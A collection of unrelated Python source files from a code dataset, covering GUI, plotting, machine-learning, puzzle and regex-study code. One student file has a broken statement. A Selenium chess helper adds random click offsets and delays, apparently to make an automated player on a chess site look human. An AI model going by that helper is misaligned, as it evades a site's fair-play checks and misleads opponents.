# add cluster information
row_idx = 1
for line in self._cluster_info:
idx = QLabel(str(line[0]))
idx.setAlignment(Qt.AlignCenter)
peak_val = QLabel(str(line[1]))
peak_val.setAlignment(Qt.AlignCenter)
coord_x = QLabel(str(line[2]))
coord_x.setAlignment(Qt.AlignCenter)
coord_y = QLabel(str(line[3]))
coord_y.setAlignment(Qt.AlignCenter)
coord_z = QLabel(str(line[4]))
coord_z.setAlignment(Qt.AlignCenter)
extent = QLabel(str(line[5]))
extent.setAlignment(Qt.AlignCenter)
grid_layout.addWidget(idx, row_idx, 0)
grid_layout.addWidget(peak_val, row_idx, 1)
grid_layout.addWidget(coord_x, row_idx, 2)
grid_layout.addWidget(coord_y, row_idx, 3)
grid_layout.addWidget(coord_z, row_idx, 4)
grid_layout.addWidget(extent, row_idx, 5)
row_idx += 1
# add labels into a scroll area
scroll_content.setLayout(grid_layout)
scrollarea = QScrollArea()
scrollarea.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOn)
scrollarea.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
#scrollarea.setWidgetResizable(False)
scrollarea.setWidget(scroll_content)
# button config
self.save_button = QPushButton("Export to csv file")
self.cancel_button = QPushButton("Close")
hbox_layout = QHBoxLayout()
hbox_layout.addWidget(self.save_button)
hbox_layout.addWidget(self.cancel_button)
vbox_layout = QVBoxLayout()
vbox_layout.addWidget(scrollarea)
vbox_layout.addLayout(hbox_layout)
self.setLayout(vbox_layout)
def _create_actions(self):
self.save_button.clicked.connect(self._save)
self.cancel_button.clicked.connect(self.done)
def _save(self):
"""Export cluster stats info to a file."""
path = QFileDialog.getSaveFileName(self, 'Save file as ...',
'output.csv',
'csv files (*.csv *.txt)')
if path:
labels = ['index', 'max value', 'X', 'Y', 'Z', 'size']
csv.nparray2csv(self._cluster_info, labels, path)
self.done(0)
| true |
860abafbb77f08350559386668cf69827ac1f6ff | Python | K4liber/Parralel | /lab1/problem5.py | UTF-8 | 1,216 | 2.828125 | 3 | [] | no_license | import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from mpl_toolkits.mplot3d import Axes3D
# Run: python3 problem5.py
df = pd.read_csv('problem5.csv',
names = [
"size", "time"
]
)
df2 = pd.read_csv('problem4.csv',
names = [
"size", "time"
]
)
df3 = pd.read_csv('problem3.csv',
names = [
"size", "time"
]
)
meanDf = df.groupby("size", as_index=False).mean()
meanDf2 = df2.groupby("size", as_index=False).mean()
meanDf3 = df3.groupby("size", as_index=False).mean()
stdDf = df.groupby("size", as_index=False).std()
stdDf2 = df2.groupby("size", as_index=False).std()
stdDf3 = df3.groupby("size", as_index=False).std(ddof=0)
plt.errorbar(x=meanDf3["size"].values, y=meanDf3["time"].values, yerr=stdDf3["time"].values, fmt='-o', label="One thread")
plt.errorbar(x=meanDf2["size"].values, y=meanDf2["time"].values, yerr=stdDf2["time"].values, fmt='-o', label="Two threads")
plt.errorbar(x=meanDf["size"].values, y=meanDf["time"].values, yerr=stdDf["time"].values, fmt='-o', label="Thread pool (two threads)")
plt.xlabel("Array size")
plt.ylabel("Time [ms]")
#plt.yscale("log")
#plt.xscale("log")
plt.legend()
plt.savefig("problem5.png")
plt.show()
| true |
e21720bcbaa2eafc4da36d4ab789cbe38ca40122 | Python | itaditya/Python | /Practise/p1.py | UTF-8 | 213 | 3.40625 | 3 | [] | no_license | #!/usr/bin/env python3.4
def post_name(name):
name+=' Ghada'
return name
print('This program will assign some cool name to you')
name=input('\nEnter Your First Name\n')
name=post_name(name)
print('\n',name)
| true |
f6146e1988b9074a2d84fc6d2a83aa9187efabef | Python | JonathanSpiller/simpleajax | /home/views.py | UTF-8 | 364 | 2.515625 | 3 | [] | no_license | from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse
from time import sleep
@login_required
def home(request):
return render(request, 'home/home.html')
def get_data(request):
sleep(1)
#fetch something from the database
car = "Porche 911"
return HttpResponse(car) | true |
fb5c74851bfc4ef41f067823b8d31aafc6a4e1a5 | Python | anacampesan/typoglycemia_py | /typoglycemia.py | UTF-8 | 641 | 3.78125 | 4 | [] | no_license | import random
# in case you want the user to be able to enter his/her own text
# test = input()
text = "The mind's ability to decipher a mis-spelled word if the first and last letters of the word are correct."
def typoglycemia(text):
words = text.split()
result = []
for word in words:
if len(word) > 3:
substring = list(word[1:-1])
random.shuffle(substring)
substring = ''.join(substring)
substring = word[0] + substring + word[-1]
result.append(substring)
else:
result.append(word)
return ' '.join(result)
print typoglycemia(text)
| true |
ae6ff8d73a4b517a425097454ec7cc9256c188a5 | Python | mattkim8/CSI | /Lab11.py | UTF-8 | 548 | 2.953125 | 3 | [] | no_license | #Lab 5
def read_file(x):
restaurants = dict()
try:
file_handle = open('restaurant.txt','r')
for line in file_handle:
stripped_line = line.rstrip()
split_line = stripped_line.split(',')
restaurants[split_line[2]] = (split_line[0],split_line[1],split_line[3],split_line[4])
if
except IOError:
print "file doesn't exist"
except ValueError:
print line
print 'there are not 5 values'
| true |
0eaafaa406c08f0cc8a0f6435a6dfb0dbdd28608 | Python | 22pilarskil/ImageRecognition | /vectorizedNetwork.py | UTF-8 | 9,298 | 2.84375 | 3 | [] | no_license | import numpy as np
import random
import codecs
import matplotlib.pyplot as plt
import json
def displayImage(pixels, label = None):
figure = plt.gcf()
figure.canvas.set_window_title("Number display")
if label != None: plt.title("Label: \"{label}\"".format(label = label))
else: plt.title("No label")
plt.imshow(pixels, cmap = "gray")
plt.show()
def compressImage(pixels, imageWidth, imageHeight, newWidth, newHeight):
widthScalar = newWidth/imageWidth
heightScalar = newHeight/imageHeight
pixels = pixels.reshape(imageHeight, imageWidth)
def createCoefficient(we):
return(np.nan_to_num(we/we))
def loadData():
print("Loading Data...")
def toInt(b):
return int(codecs.encode(b, "hex"), 16)
def normalize(rawArray, range_):
array = np.copy(rawArray).astype(np.float32)
if range_ == (0, 1):
return range_
array-=range_[0]
dist = abs(range_[0])+abs(range_[1])
array /= dist
return array
def vectorize(num):
array = np.zeros(10)
array[num] = 1
return array
def loadFile(fileName, mode="rb"):
with open(fileName, mode) as raw:
data = raw.read()
magicNumber = toInt(data[:4])
length = toInt(data[4:8])
if magicNumber==2049:
#labels
parsed = np.frombuffer(data, dtype=np.uint8, offset = 8)
elif magicNumber==2051:
#images
numOfRows = toInt(data[8:12])
numOfColumns = toInt(data[12:16])
parsed = normalize(np.frombuffer(data, dtype=np.uint8, offset = 16).reshape(length, numOfRows*numOfColumns), (0, 255))
else: return -1
return parsed
#add validation if needed
data = {"train":[], "test":[]}
trainImages = loadFile("/Users/MichaelPilarski1/Desktop/Neural_Network/data/train-images-idx3-ubyte")
trainLabels = loadFile("/Users/MichaelPilarski1/Desktop/Neural_Network/data/train-labels-idx1-ubyte")
data["train"] = np.asarray(list(zip(trainImages, np.asarray([vectorize(i) for i in trainLabels]))))
testLabels = loadFile("/Users/MichaelPilarski1/Desktop/Neural_Network/data/t10k-labels-idx1-ubyte")
testImages = loadFile("/Users/MichaelPilarski1/Desktop/Neural_Network/data/t10k-images-idx3-ubyte")
data["test"] = np.asarray(list(zip(testImages, np.asarray([vectorize(i) for i in testLabels]))))
return data
'''
Before using this function, you must first download all four of the binary array files from this link (http://yann.lecun.com/exdb/mnist/)
Drag them to your directory without double clicking them, and only once you have placed them in a separate directory (in my case, 'data') do you double click them
Change the argument in the laodFile function to the directory paths of each of the files
'''
def sigmoid(x):
return float(1)/(float(1)+np.exp(-x))
def derivSigmoid(x):
return sigmoid(x)*(1-sigmoid(x))
def retreiveNetwork():
biases = {}
weights = {}
b = []
w = []
def take(fileName, mode, dictionary, listName):
with open(fileName, mode) as JSONFile:
data = json.load(JSONFile)
for i in data:
dictionary[i] = []
for j in range(len(data[i])):
dictionary[i].append(data[i][j])
for i in dictionary:
dictionary[i] = np.asarray(dictionary[i])
placeHolder = 0
while (placeHolder<(len(dictionary))):
for i in dictionary:
if (int(i)==placeHolder):
listName.append(dictionary[i])
placeHolder+=1
take("weights.txt", 'r', weights, w)
take("biases.txt", 'r', biases, b)
return w, b
class Network():
def __init__ (self, sizes, trainedWeights=None, trainedBiases=None, saveNetworkStuff=True):
self.numOfLayers = len(sizes)
if (trainedWeights==None):
self.weights = [np.random.randn(y, x)/np.sqrt(x) for y, x in zip(sizes[1:], sizes[:-1])]
self.storedWeights = np.copy(self.weights)
self.biases = [np.random.randn(y, 1) for y in sizes[1:]]
self.storedBiases = np.copy(self.biases)
else:
self.weights = trainedWeights
self.biases = trainedBiases
self.saveNetworkStuff = saveNetworkStuff
self.minimum = 100
self.streak = 0
def saveNetwork(self):
trainedBiases = {}
trainedWeights = {}
for i in range(len(self.weights)):
trainedBiases[i] = []
trainedWeights[i] = []
for j, k in zip(self.biases[i], self.weights[i]):
trainedBiases[i].append(j.tolist())
trainedWeights[i].append(k.tolist())
with open("weights.txt", 'w+') as JSONFile:
json.dump(trainedWeights, JSONFile)
with open("biases.txt", 'w+') as JSONFile:
json.dump(trainedBiases, JSONFile)
def earlyStop(self, totalPercent, epochs):
specialNum = .05*epochs+4
if (totalPercent>self.minimum): self.streak+=1
else:
self.minimum = totalPercent
self.streak = 0
self.storedWeights = np.copy(self.weights)
self.storedBiases = np.copy(self.biases)
if (self.streak>=specialNum): return True
else: return False
def SGD(self, trainingData, miniBatchSize, epochs, eta, testData, printNumber, lmbda=0):
print("Starting Stochastic Gradient Descent...")
self.totalCorrect = 0
self.totalPercent = 0
def reset():
self.totalPercent = 0
self.totalCorrect = 0
def makeCheck(label):
reset()
self.totalCorrect = 0
for x, y in testData:
percent, correct = self.mse(x.reshape(784, 1), y)
self.totalCorrect+=correct
self.totalPercent+=percent
self.totalPercent/=(len(testData)/100)
print(label)
print("Percent Error: %.8f. Total Correct: %d/%d" %(self.totalPercent, self.totalCorrect, len(testData)))
reset()
makeCheck("Initialization:")
for j in range(epochs):
reset()
random.shuffle(trainingData)
miniBatches = [trainingData[k:k+miniBatchSize] for k in range(0, len(trainingData), miniBatchSize)]
for miniBatch in miniBatches:
self.updateMiniBatch(miniBatch, eta, lmbda, len(trainingData))
for x, y in testData:
percent, correct = self.mse(x.reshape(784, 1), y)
self.totalCorrect+=correct
self.totalPercent+=percent
self.totalPercent/=(len(testData)/100)
if (j%printNumber==0):
print("Epoch %d complete. Percent Error: %.8f. Total Correct: %d/%d" %(j, self.totalPercent, self.totalCorrect, len(testData)))
if (self.earlyStop(self.totalPercent, epochs)):
print("Network oversaturated- exiting SGD")
self.weights = np.copy(self.storedWeights)
self.biases = np.copy(self.storedBiases)
break
makeCheck("Final Status:")
if(self.saveNetworkStuff):
self.saveNetwork()
print("Weights and Biases Saved")
def updateMiniBatch(self, miniBatch, eta, lmbda, n):
weightError = [np.zeros(w.shape) for w in self.weights]
biasError = [np.zeros(b.shape) for b in self.biases]
for x, y in miniBatch:
x = x.transpose()
deltaWeightError, deltaBiasError = self.backprop(x, y)
weightError = [we+dwe+(lmbda/len(miniBatch)*w)for we, dwe, w in zip(weightError, deltaWeightError, self.weights)]
#weightError = [we+dwe for we, dwe in zip(weightError, deltaWeightError)]
biasError = [be+dbe for be, dbe in zip(biasError, deltaBiasError)]
self.weights = [w-(((float(eta)/len(miniBatch))*we)) for w, we in zip(self.weights, weightError)]
self.biases = [b-(((float(eta)/len(miniBatch))*be)) for b, be in zip(self.biases, biasError)]
def backprop(self, x, y):
weightError = [np.zeros(w.shape) for w in self.weights]
biasError = [np.zeros(b.shape) for b in self.biases]
delta = [np.zeros(b.shape) for b in self.biases]
activation = x.reshape(784, 1)
activations = [activation]
zs = []
z = ""
for w, b in zip(self.weights, self.biases):
z = np.dot(w, activation)+b
zs.append(z)
activation = sigmoid(z)
activations.append(activation)
delta[-1] = self.costDerivative(activations[-1], y)
weightError[-1] = np.dot(activations[-2], delta[-1]).T
biasError[-1] = delta[-1].T
for i in range(2, self.numOfLayers):
z = zs[-i]
delta[-i] = np.dot(delta[-i+1], self.weights[-i+1]) * derivSigmoid(z).T
biasError[-i] = delta[-i].T
weightError[-i] = (activations[-i-1]*delta[-i]).T
'''
negs = 0
x = 0
for w in weightError:
for ww in w:
for www in ww:
if (www==0): negs+=1
print("%d/%d" %(negs, 30*784+10*30))
'''
return weightError, biasError
def feedforward(self, activation):
for w, b in zip(self.weights, self.biases): activation = sigmoid(np.dot(w, activation)+b)
return(activation)
def mse(self, x, y):
prediction = self.feedforward(x).reshape(10)
correct = 0
percent = (np.linalg.norm(y.reshape(1, 10)-prediction) ** 2)
if np.argmax(prediction) == np.argmax(y): correct = 1
return percent, correct
def classify(self, trainingData):
x = self.feedforward(trainingData[0].reshape(784, 1)).reshape(1, 10)
print("Network prediction: %d. Actual: %d" %(np.argmax(x), np.argmax(trainingData[1])))
displayImage(trainingData[0].reshape(28, 28))
def costDerivative(self, activation, y):
return activation.T-y
#Parameter Declarations-------------
numOfInputs = 784
epochs = 20
sizeOfMinis = 10
learnRate = 0.5
sizes = np.array([numOfInputs,30,10])
regularizationParam = 0.0
printNumber = 1
#-----------------------------------
#Learning/Classify------------------
w, b = retreiveNetwork()
network = Network(sizes, trainedWeights=w, trainedBiases=b, saveNetworkStuff=True)
trainingData = loadData()
#network.classify(trainingData["test"][100])
network.SGD(trainingData["train"], sizeOfMinis, epochs, learnRate, trainingData["test"], printNumber, regularizationParam)
#----------------------------------
| true |
7a00393af784af624b25405468c18d4d8bc57ccb | Python | sheric98/minimax_player | /chessWeb/util.py | UTF-8 | 2,007 | 2.671875 | 3 | [] | no_license | import math
import random
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions as EC
def sleep_random(start, end):
sleep_time = random.uniform(start, end)
time.sleep(sleep_time)
def remove_popup(driver):
class_name = 'icon-font-chess x modal-seo-close-icon'
el = WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.XPATH, f"//span[@class='{class_name}']")))
x = driver.find_element_by_xpath(f"//span[@class='{class_name}']")
x.click()
def wait_indefinite(xpath, driver):
while True:
try:
WebDriverWait(driver, 30).until(EC.presence_of_element_located((By.XPATH, xpath)))
break
except TimeoutError:
continue
def get_offset(dim):
usable = (math.floor(0.9 * dim) - 1) // 2
if usable <= 0:
return 0
return random.randint(-usable, usable)
def click_el(el, driver):
off_x = get_offset(el.size['width'])
off_y = get_offset(el.size['height'])
ac = ActionChains(driver)
ac.move_to_element(el).move_by_offset(off_x, off_y).click().perform()
def get_square_el(square_str, driver):
class_num = str(file_num(square_str[0])) + square_str[1]
class_name = f'square-{class_num}'
xpath = f"//div[contains(@class,'{class_name}')]"
WebDriverWait(driver, 5).until(EC.element_to_be_clickable((By.XPATH, xpath)))
return driver.find_element_by_xpath(xpath)
def parse_move(move_str, board):
try:
move = board.parse_san(move_str)
return move
except ValueError:
try:
move = board.parse_uci(move_str)
return move
except ValueError:
print('Illegal or uninterpretable move')
exit(-1)
def file_num(x):
return ord(x) - ord('a') + 1 | true |
96c20f030fabe6b36699c5d266b0a85a1752431f | Python | gugi200/project2021-UoB-ad20781 | /finding_resitance.py | UTF-8 | 936 | 3.296875 | 3 | [] | no_license | import math
res_value_1 = [100, 180, 270, 390, 680, 1000]
res_value_2 = res_value_1
res = []
res1 = []
ind = []
'''
((1/res_value_1)+1/res_value_2))**-1
resistance for all combinations in parallel
'''
r=0
for X in res_value_1:
c=0
for Y in res_value_2:
res.append(((1/X)+(1/Y))**-1)
index = (r, c)
ind.append(index)
c+=1
r+=1
'''
zipps every possible resistor combination with indexes of them
'''
for row in range(0,36):
for column in range(0, 36):
value = res[row]+res[column]
row_f=ind[row]
col_f=ind[column]
grand_finale = [value, row_f, col_f]
res1.append(grand_finale)
for result in res1:
if 307<result[0]<313:
resistor1 = res_value_1[result[1][0]], res_value_1[result[1][1]]
resistor2 = res_value_1[result[2][0]], res_value_1[result[2][1]]
print(result[0])
print(resistor1, '+', resistor2, '\n')
| true |
309e1b47612cd93678c9815352340f002ed0bcf0 | Python | amirgraily7/PDFMetadataExtractor | /py/box_phrase_candidate_finder.py | UTF-8 | 4,064 | 2.890625 | 3 | [] | no_license | from candidate import CandidateFinder, Candidate
import re
MAX_LENGTH = 10000
class BoxPhraseCandidateFinder(CandidateFinder):
"""Find candidates by presence of certain phrases in their box."""
def __init__(self, field, fid, phrases, candidate_lines,
bbox=None, min_height=0, max_height=MAX_LENGTH, min_width=0,
max_width=MAX_LENGTH, min_page=0, max_page=None):
""" Set parameters for the candidate search.
:param field: The field to search for.
:param fid: The finder id of this object.
:param phrases: The phrases to look for in the box.
:param candidate_lines: The indices of the lines to be designated
candidates.
:param bbox: The bounding box within which to search.
:param min_height: The minimum height box to consider.
:param max_height: The maximum height box to consider.
:param min_width: The minimum width box to consider.
:param max_width: The maximum width box to consider.
:param min_page: The minimum page number to look on.
:param max_height: The maximum page number to look on.
"""
self._phrases = phrases
self._candidate_lines = candidate_lines
self._counts = {}
self._min_height = min_height
self._max_height = max_height
self._min_width = min_width
self._max_width = max_width
self._min_page = min_page
self._max_page = max_page
self._bbox = bbox if bbox else [0, 0, MAX_LENGTH, MAX_LENGTH]
CandidateFinder.__init__(self, field, fid)
def _boxes_in_bbox(self, document):
""""Get all boxes in the bounding box with acceptable dimensions"""
bbox = self._bbox
boxes = document.get_boxes()
return [box for box in boxes if bbox[0] <= box.x0 and
box.x1 <= bbox[2] and bbox[1] <= box.y0 and
box.y1 <= bbox[3] and self._allowed_page(box) and
self._acceptable_dimensions(box)]
def _allowed_page(self, box):
"""Determine whether a given box is on a page within search bounds."""
if self._max_page:
return self._min_page <= box.page <= self._max_page
else:
return self._min_page <= box.page
def _has_phrase(self, box):
"""Determine whether a box has the sought phrases."""
lines = box.get_lines()
pattern = self.field.settings.pattern_builder.list_pattern(self._phrases)
for line in lines:
if re.search(pattern, line.text) is not None:
return True
return False
def _acceptable_dimensions(self, box):
"""Check whether a box falls within the allowed height and width"""
return self._min_width < box.x1-box.x0 < self._max_width and\
self._min_height < box.y1-box.y0 < self._max_height
def get_candidates(self, document):
"""Get all candidates for a document."""
if not hasattr(document, "id"):
document.id = 0
self._counts[document.id] = 0
strip_labels = self.field.settings.strip_labels
field = self.field
boxes = [box for box in self._boxes_in_bbox(document)
if self._has_phrase(box)]
key = lambda l: (-l.y0, l.x0)
candidates = []
for box in boxes:
lines = sorted(box.get_lines(), key=key)
for index in self._candidate_lines:
try:
line = lines[index]
stripped = strip_labels(line.text)
preprocessed = [field.preprocess(text) for text in stripped]
matches = [field.find_value(text) for text in preprocessed]
if len(matches):
candidates.append(Candidate(line, field, matches[0], self.fid, self._counts[document.id]))
except (IndexError, TypeError):
# No such line exists in this box! Don't produce a candidate.
pass
return candidates
| true |
00e933ca78733095c4667986c19defe47fef890e | Python | anyeljm/ml_framework | /src/categorical_features.py | UTF-8 | 1,208 | 3.359375 | 3 | [] | no_license | import pandas as pd
from sklearn import preprocessing
class CategoricalFeatures():
"""
df: pandas DataFrame
categorical_features: list of columns to encode
encoding_type: str -> 'label' or 'ohe'
"""
def __init__(self, df, categorical_features, encoding_type):
self.df = df
self.cat_feats = categorical_features
self.enc_type = encoding_type
for c in self.df.columns:
self.df.loc[:, c] = self.df.loc[:, c].astype(str).fillna("None")
def processing(self):
if self.enc_type == 'label':
for c in self.cat_feats:
lbl = preprocessing.LabelEncoder()
self.df.loc[:, c] = lbl.fit_transform(self.df.loc[:, c].values)
return self.df
if self.enc_type == 'ohe':
for c in self.cat_feats:
ohe = preprocessing.OneHotEncoder()
array = pd.DataFrame(ohe.fit_transform(self.df.loc[:, c].values.reshape(-1,1)).toarray())
self.df = pd.concat([self.df.drop(c, axis=1), array], axis=1)
return self.df
else:
raise Exception(f"Enconding type not implemented: {self.enc_type}")
| true |
3c03c1d7ab2693f3cdc9b4cb2c17c0bfeaf0a2ba | Python | skang6283/algorithm_daily | /Programmers/이중우선순위큐.py | UTF-8 | 1,364 | 2.875 | 3 | [] | no_license | from heapq import *
def solution(operations):
deleted = set()
maxheap = []
minheap = []
for op in operations:
cmd, num = op.split(' ')
num = int(num)
if cmd == 'D':
if num == 1:
while True:
if maxheap:
a = heappop(maxheap)
if a not in deleted:
deleted.add(-a)
break
else:
break
else:
while True:
if minheap:
a = heappop(minheap)
if a not in deleted:
deleted.add(a)
break
else:
break
else:
heappush(maxheap, -num)
heappush(minheap, num)
maxheap = list(set(maxheap) - set([-num for num in deleted]))
minheap = list(set(minheap) - set(deleted))
heapify(maxheap)
heapify(minheap)
answer = [0, 0]
if maxheap and minheap:
answer = [-heappop(maxheap), heappop(minheap)]
if maxheap and not minheap:
mx = -heappop(maxheap)
answer = [mx, mx]
if not maxheap and minheap:
mn = heappop(maxheap)
answer = [mn, mn]
return answer | true |
041c7cecb4f11bafd6833dc6f57185974d29b522 | Python | Aradhya910/numberguesser | /numberguesser.py | UTF-8 | 868 | 4.4375 | 4 | [] | no_license | import random
number = random.randint(1, 10)
player_name = input('What is your name? ')
number_of_guesses = 0
print('''Hello! ''' + player_name + " Let's start the game, Press W for instructions. " )
instructions = input('')
if instructions.upper() == 'W':
print(''' You have to guess a random number between 1 to 10
You only have 5 number of guesses! ''')
else:
print("I did not understand that, sorry ")
quit()
while number_of_guesses <= 4:
guess = int(input())
number_of_guesses += 1
if guess < number:
print('The guess is low. ')
if guess > number:
print('The guess is high. ')
if guess == number:
break
if guess == number:
print('You guessed the number in ' + str(number_of_guesses) + ' tries! ')
else:
print('Alas you lost! The number was ' + str(number) + '. ')
| true |
3c2853dbdcb212742d5e19304b6ff909a70a3507 | Python | guoshan45/guoshan-pyschool | /For Loops/03.py | UTF-8 | 137 | 3.03125 | 3 | [] | no_license | def generateNumber(start,end,step):
if step>0:
return range(start,end+1,step)
else:
return range(start,end,step) | true |
b582cac348c496d522347c9389bb77a8e735cb20 | Python | thesubquery/advent_of_code | /aoc.py | UTF-8 | 3,685 | 3.21875 | 3 | [
"Apache-2.0"
] | permissive | # Python Standard Library
import argparse
import os
import sys
from collections import Counter
# pypi
# local modules
def get_input(file):
with open(file, 'r') as f:
data = f.readlines()
data = [d.strip() for d in data]
return data
if __name__ == "__main__":
# Command line options
# Create the parser
my_parser = argparse.ArgumentParser(prog='Advent_of_Code',
description='Solutions to Advent of Code problems.')
# Add positional arguments
my_parser.add_argument('year', type=int, help='Year 2015 to 2020', choices=range(2015, 2021))
my_parser.add_argument('day', type=int, help='Day 1 through 25', choices=range(1, 26))
my_parser.add_argument('part', type=int, help='Part 1 or 2', choices=range(1, 3))
my_parser.add_argument('input_file', type=str, help='Path to input file')
# Add optional arguments
my_parser.add_argument('-v', '--verbose', action='store_true', help='an optional argument')
# Execute the parse_args() method
args = my_parser.parse_args()
# Check if file exists
path = os.path.join(os.getcwd(), args.input_file)
if not os.path.isfile(path):
print('The path specified does not exist: {}'.format(path))
sys.exit()
aoc_year = args.year
aoc_day = args.day
aoc_part = args.part
if aoc_year == 2015:
from aoc_2015 import *
elif aoc_year == 2016:
from aoc_2016 import *
elif aoc_year == 2017:
from aoc_2017 import *
elif aoc_year == 2018:
from aoc_2018 import *
elif aoc_year == 2019:
from aoc_2019 import *
elif aoc_year == 2020:
from aoc_2020 import *
# Solutions nested by day and part number
solutions = {i: {1: f"Day: {i} Part 1", 2: f"Day: {i} Part 2"} for i in range(1, 26)}
# Map functions to solutions
solutions[1][1] = day_1
solutions[1][2] = day_1
solutions[2][1] = day_2
solutions[2][2] = day_2
solutions[3][1] = day_3
solutions[3][2] = day_3
solutions[4][1] = day_4
solutions[4][2] = day_4
solutions[5][1] = day_5
solutions[5][2] = day_5
solutions[6][1] = day_6
solutions[6][2] = day_6
solutions[7][1] = day_7
solutions[7][2] = day_7
solutions[8][1] = day_8
solutions[8][2] = day_8
solutions[9][1] = day_9
solutions[9][2] = day_9
solutions[10][1] = day_10
solutions[10][2] = day_10
solutions[11][1] = day_11
solutions[11][2] = day_11
solutions[12][1] = day_12
solutions[12][2] = day_12
solutions[13][1] = day_13
solutions[13][2] = day_13
solutions[14][1] = day_14
solutions[14][2] = day_14
solutions[15][1] = day_15
solutions[15][2] = day_15
solutions[16][1] = day_16
solutions[16][2] = day_16
solutions[17][1] = day_17
solutions[17][2] = day_17
solutions[18][1] = day_18
solutions[18][2] = day_18
solutions[19][1] = day_19
solutions[19][2] = day_19
solutions[20][1] = day_20
solutions[20][2] = day_20
solutions[21][1] = day_21
solutions[21][2] = day_21
solutions[22][1] = day_22
solutions[22][2] = day_22
solutions[23][1] = day_23
solutions[23][2] = day_23
solutions[24][1] = day_24
solutions[24][2] = day_24
solutions[25][1] = day_25
solutions[25][2] = day_25
# Print input
if args.verbose:
data = get_input(path)
for d in enumerate(data):
print(d)
# Get data from input file
data = get_input(path)
# Execute solution
sol = solutions[args.day][args.part]
res = sol(args.part, data)
print(f"Year: {aoc_year} Day: {aoc_day} Part: {aoc_part} Solution: {res}")
| true |
b622cc6ebe4ae25eeb062ce015b711cea2d62871 | Python | zkatemor/thesaurus | /total_statistic.py | UTF-8 | 1,770 | 3.125 | 3 | [] | no_license | import json
def get_union(dict_first, dict_second):
union = []
for words_first in dict_first:
for words_second in dict_second:
if words_first == words_second:
if words_second not in union:
union.append(words_second)
elif words_first not in union:
union.append(words_first)
else:
break
return union
def get_intersections(dict_first, dict_second):
intersections = []
for words_first in dict_first:
for words_second in dict_second:
if (words_first == words_second and dict_first[words_first] == dict_second[words_second]) \
and words_first not in intersections:
intersections.append(words_first)
return intersections
# загружаем построенные словари оценочной лексики из json файла
with open('chi_square_dicts/chi_dict_plus.json', 'r', encoding='utf-8') as f:
chi_dict_plus = json.load(f)
with open('chi_square_dicts/chi_dict_minus.json', 'r', encoding='utf-8') as f:
chi_dict_minus = json.load(f)
# формирование общего полученного словаря
chi_dictionary = {}
for word in chi_dict_minus:
chi_dictionary[word[0]] = 'negative'
for word in chi_dict_plus:
chi_dictionary[word[0]] = 'positive'
with open('tagged_dictionary/tagged_dictionary.json', 'r', encoding='utf-8') as f:
cnn_dictionary = json.load(f)
a = {'a': 0, 'b': '2'}
b = {'c': 2, 'b': 1}
c = a.copy()
a.update(b)
chi = chi_dictionary.copy()
chi.update(cnn_dictionary)
print(len(get_intersections(chi_dictionary, cnn_dictionary)))
print(len(get_union(chi_dictionary, cnn_dictionary)))
| true |
6a0e2624aa02bf97922a7a1448c0665661affa95 | Python | tildesarecool/ReallyHadtoPython | /automate boring stuff/lesson 30 chapter 8 filenames and paths.py | UTF-8 | 6,923 | 3.4375 | 3 | [] | no_license | # filenames and absolute/relative file paths
# lesson 30 / chapter 8
# pages ??
#
# summmary
# ? = says group matches zero or one times
# * = zero or more times
# + = one or more times
# { } = match specific number of times
# { } w/ some number matches minimum and max number of times
# leaving out first or seond number in curly braces says there is no min or max
# "greedy" matching will match logest string possible
# "nongreed" matching will match shortest string possible
# putting ? after curly braces makes it do a nongreedy match
# notes:
# search returns match objects
# findall returns list of strings
# behavrior for regex objects that have or one groups in them (groups being with the \d\d\d inside () ) is
# find all returns list of strings will just be text foundmatching that pattern
# see lesson 26 around 3 minutes in for phrasing with on-screen "correction"
#sfindallMatchesEx2 = phoneRegex2.findall(LongSringExample)
# returns have strings, tuples
# has zero or one groups == list of strings
# if has two or more groups list of tuples of strings
# character classses
#digitRegex = re.compile('(0|1|2|3|4|5|6|7|8|9') # same is /d
# table 7-1 in the book
# /D (cap D) is "any character not numberic between 0 and 9"
# /w is "any letter, numberic digit or underscore character" referred to as "word"
# /W (cap W) "any character that is NOT a letter, numberic digit or underscore character"
# /s any space, tab or newline character (e.g. "matching the space characters")
# /S (cap S) any character NOT space, tab or newline character (e.g. "matching the space characters")
# make cusotm/own character classes with [] e.g [aeiou]
# a caret ^ makes a negative character class, matching anything NOT in the backets, like [^aeiou] for all non-vowels
# having period/dot means "any character not newline"
#atRegex = re.compile('.at')
#atResult = atRegex.findall('The cat in the hat sat on the flat mat')
#print(atResult)
# altered version so that output matches with whole of 'flat' instead of just the 'lat' portion of 'flat'
# this also matches spaces
#atRegex = re.compile(r'.{1,2}at')
#atResult = atRegex.findall('The cat in the hat sat on the flat mat')
#print(atResult)
# .* notation is all the stuff
#atResult = atRegex.findall('The cat in the hat sat on the flat mat')
#print(dotstarResult)
# output
# [('Al', 'Swagger')]
# notes
# (.*) is greedy mode - "match as much text as possible"
# (.*?) is non-greedy mode
# also the INGORECASE option
# ^ means string must start with the pattern, $ means the string must end with the pattern
# both means the entire string must match the pattern
#
# The . dot is a wildcard; it matches anything except newlines
# pass re.DOTALL as the second argument to re.compile() to make the . dot match newlines too
#
# pass re.I (for INGORECASE) as second argument to re.compile() to make the matching non-case-sensitive
#
# the sub() method
# namesRegEx = re.compile(r'Agent \w+')
# nameresult = namesRegEx.findall('Agent Alice gave the secret documents to Agent Bob')
# print(nameresult)
# output
# ['Agent Alice', 'Agent Bob']
# namesRegEx = re.compile(r'Agent \w+')
# nameresult = namesRegEx.sub('REDACTED', 'Agent Alice gave the secret documents to Agent Bob')
# print(nameresult)
# Successful find/replace output
# REDACTED gave the secret documents to REDACTED
#################### Using \1 \2 etc in sub()
## namesRegEx = re.compile(r'Agent (\w)\w*')
# this would just be
# # nameresult = namesRegEx.findall('Agent Alice gave the secret documents to Agent Bob')
# output 'A' and 'B' (for alice and bob)
# the \1 refers to the first group
## nameresult = namesRegEx.sub(r'Agent \1****', 'Agent Alice gave the secret documents to Agent Bob')
## print(nameresult)
# so it iwill be first letter and asterisks instead of redacted
# output
# Agent A**** gave the secret documents to Agent B****
####################### Verbose Mode with re.VERBOSE
# verbose can be used in place of that \d\d\d in the phone numbers example
# recap
# the sub() regex method will substitute matches with some other text
# using \1, \2, and so on will substitute group 1,2, etc in regex pattern
